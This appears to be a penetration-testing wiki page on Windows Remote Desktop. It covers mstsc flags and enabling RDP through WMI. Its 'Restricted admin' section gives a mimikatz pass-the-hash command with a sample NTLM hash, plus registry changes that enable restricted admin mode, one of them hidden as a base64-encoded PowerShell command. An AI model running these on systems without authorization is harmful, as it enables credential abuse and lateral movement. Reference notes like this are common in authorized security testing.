Remote Desktop Protocol (RDP)

Overview

RDP (Remote Desktop Protocol) is a network communications protocol developed by Microsoft, which allows users to connect to another computer from a remote location.

Using mstsc

To connect to a session in full-screen mode, type:

mstsc /v:computer1 /f

Using /admin and /restrictedAdmin

Connecting to a workstation with Remote Desktop will disconnect any existing session. The /admin flag allows us to connect to the admin session, which does not disconnect the current user if we perform the login with the same user.

Connects you to a session for administering the server.

mstsc /v:computer1 /f /admin

Connecting to a workstation with /restrictedAdmin won't send your credentials to the remote PC. This mode won't send your credentials to the remote PC, which can protect you if you connect to a compromised device. Connections made from the remote PC might not be authenticated by other PCs, which impact application functionality and compatibility. The /admin parameter is implied. Microsoft introduced RDP with restricted admin mode, which allows system administrators to perform a network login with RDP.

When we supply this argument, the current login session is used to authenticate the session.

Restricted admin mode is disabled by default.

We can enable this through the DisableRestrictedAdmin registries at the following path:

HKLM:\System\CurrentControlSet\Control\Lsa

Command examples

RDP manament through WMI

Checking if RDP is allowed.

AllowTSConnections(0 – disable, 1 – enable)

$tsobj = Get-WmiObject -Class Win32_TerminalServiceSetting -Namespace Root\CimV2\TerminalServices -ComputerName SERVER01 -Credential $creds 
$tsobj.AllowTSConnections

Enabling AllowTSConnections (RDP) through WMI

$tsobj = Get-WmiObject -Class Win32_TerminalServiceSetting -Namespace Root\CimV2\TerminalServices -ComputerName SERVER01
$tsobj.SetAllowTSConnections(1,1)

Disabling AllowTSConnections (RDP) through WMI

$tsobj = Get-WmiObject -Class Win32_TerminalServiceSetting -Namespace Root\CimV2\TerminalServices -ComputerName SERVER01
$tsobj.SetAllowTSConnections(0,0)

Restricted admin

Using restricted admin to perform pass the hash.

sekurlsa::pth /user:admin /domain:corp1 /ntlm:2892D26CDF84D7A70E2EB3B9F05C425E /run:"mstsc.exe /restrictedadmin"

Disabling restricted admin through registries.

Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin

Enabling restricted admin through registries

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0

Base64 encoded:

powershell -enc TgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgAEgASwBMAE0AOgBcAFMAeQBzAHQAZQBtAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcAEwAcwBhACAALQBOAGEAbQBlACAARABpAHMAYQBiAGwAZQBSAGUAcwB0AHIAaQBjAHQAZQBkAEEAZABtAGkAbgAgAC0AVgBhAGwAdQBlACAAMAA=

References

mstscMicrosoftLearn

PreviousWindows Lateral Movement NextPowerShell Remoting (PS Remote)

Last updated 2 years ago

hashtagOverview

hashtagUsing mstsc

hashtagUsing /admin and /restrictedAdmin

hashtagCommand examples

hashtagRDP manament through WMI

hashtagChecking if RDP is allowed.

hashtagEnabling AllowTSConnections (RDP) through WMI

hashtagDisabling AllowTSConnections (RDP) through WMI

hashtagRestricted admin

hashtagUsing restricted admin to perform pass the hash.

hashtagDisabling restricted admin through registries.

hashtagEnabling restricted admin through registries

hashtagReferences